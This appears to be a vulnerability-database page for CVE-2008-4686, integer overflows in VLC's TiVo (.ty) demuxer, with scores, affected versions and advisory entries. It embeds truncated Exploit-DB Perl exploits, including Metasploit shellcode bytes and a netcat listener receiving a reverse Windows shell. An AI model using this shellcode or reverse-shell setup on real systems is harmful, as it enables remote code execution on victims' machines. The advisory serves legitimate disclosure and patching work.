CVE-2008-4686
published 2008-10-22CVE-2008-4686: Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
9.94%
95.0th percentile
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.h-4.1 (bookworm) | vlc 0.8.6.h-4.1 (bookworm) |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.h-4.1 | 0.8.6.h-4.1 |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2p9m-qq44-x2r6: Multiple integer overflows in ty
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2008-4686 [CRITICAL] GHSA-2p9m-qq44-x2r6: Multiple integer overflows in ty
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
OSV
CVE-2008-4686: Multiple integer overflows in ty
osv·2008-10-22·CVSS 9.3
CVE-2008-4686 [CRITICAL] CVE-2008-4686: Multiple integer overflows in ty
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
Debian
CVE-2008-4686: vlc - Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer)...
vendor_debian·2008·CVSS 9.3
CVE-2008-4686 [CRITICAL] CVE-2008-4686: vlc - Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer)...
Multiple integer overflows in ty.c in the TY demux plugin (aka the TiVo demuxer) in VideoLAN VLC media player, probably 0.9.4, might allow remote attackers to execute arbitrary code via a crafted .ty file, a different vulnerability than CVE-2008-4654.
Scope: local
bookworm: resolved (fixed in 0.8.6.h-4.1)
bullseye: resolved (fixed in 0.8.6.h-4.1)
forky: resolved (fixed in 0.8.6.h-4.1)
sid: resolved (fixed in 0.8.6.h-4.1)
trixie: resolved (fixed in 0.8.6.h-4.1)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
exploitdb·2008-10-23
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft C
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
exploitdb·2008-10-21
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow
---
#!/usr/bin/perl
# 10/21/2008 k`sOSe
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\
No writeups or analysis indexed.
http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=d859e6b9537af2d7326276f70de25a840f554dc3http://www.openwall.com/lists/oss-security/2008/10/19/2http://www.openwall.com/lists/oss-security/2008/10/22/6http://www.securityfocus.com/bid/31867https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14630http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=d859e6b9537af2d7326276f70de25a840f554dc3http://www.openwall.com/lists/oss-security/2008/10/19/2http://www.openwall.com/lists/oss-security/2008/10/22/6http://www.securityfocus.com/bid/31867https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14630
2008-10-22
Published